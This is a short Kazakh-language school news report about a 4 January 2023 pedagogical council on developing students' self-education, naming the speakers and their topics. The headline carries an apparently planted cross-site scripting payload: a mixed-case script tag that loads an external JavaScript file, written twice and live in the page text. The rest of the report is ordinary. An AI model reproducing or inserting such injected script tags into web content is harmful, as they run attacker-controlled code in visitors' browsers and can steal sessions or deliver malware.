«Оқушылардың семантикалық сферасының тұлғалық өзіндік даму құралы ретінде қалыптасуы» тақырыбындағы педагогикалық кеңес өткізілді.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
08.01.2023
2023 жылдың 4 қаңтар күні «Оқушылардың семантикалық сферасының тұлғалық өзіндік даму құралы ретінде қалыптасуы» тақырыбындағы педагогикалық кеңес педагогикалық шеберхана формасында өткізілді. Мақсаты: білім беру процесінде және сыныптан тыс уақытта оқушыларды өзін-өзі тәрбиелеуге және өзін-өзі дамытуға ынталандыру бойынша мұғалімдердің құзыреттілігін арттыру. «Мұғалімдердің кәсіби деңгейін көтеру жолдары» тақырыбы бойынша директордың бейіндік оқыту жөніндегі орынбасары Абдуалиева К. Е. баяндама жасады. Бастауыш сыныптарында, гуманитарлық және жаратылыстану-математикалық бағыттарындағы пәндерді оқытудағы оқушылардың өзіндік білім алуын қалыптастыру мен дамыту бойынша жұмыстардың формалары мен әдістерін Жуманова С. Е., Ериков К. З., Аканова А. Р. практикалық бөлімде мұғалімдермен жүргізіп, іс-тәжірибелерімен бөлісті. «Мүмкіндігі шектеулі оқушылардың өзіндік білім алуын қалыптастыру және дамыту бойынша жұмыстардың формалары мен әдістері» тақырыбында жүргізіп жатқан жұмыстары туралы инклюзивтік оқыту кабинетінің психологі Байжуманова М. ақпарат берді. Педагогикалық шеберхана соңында осы бағыттағы жүргізіліп жатқан жұмыстардың нәтижесін пысықтап, әдістемелік әзірлемелер дайындау ұсынылды.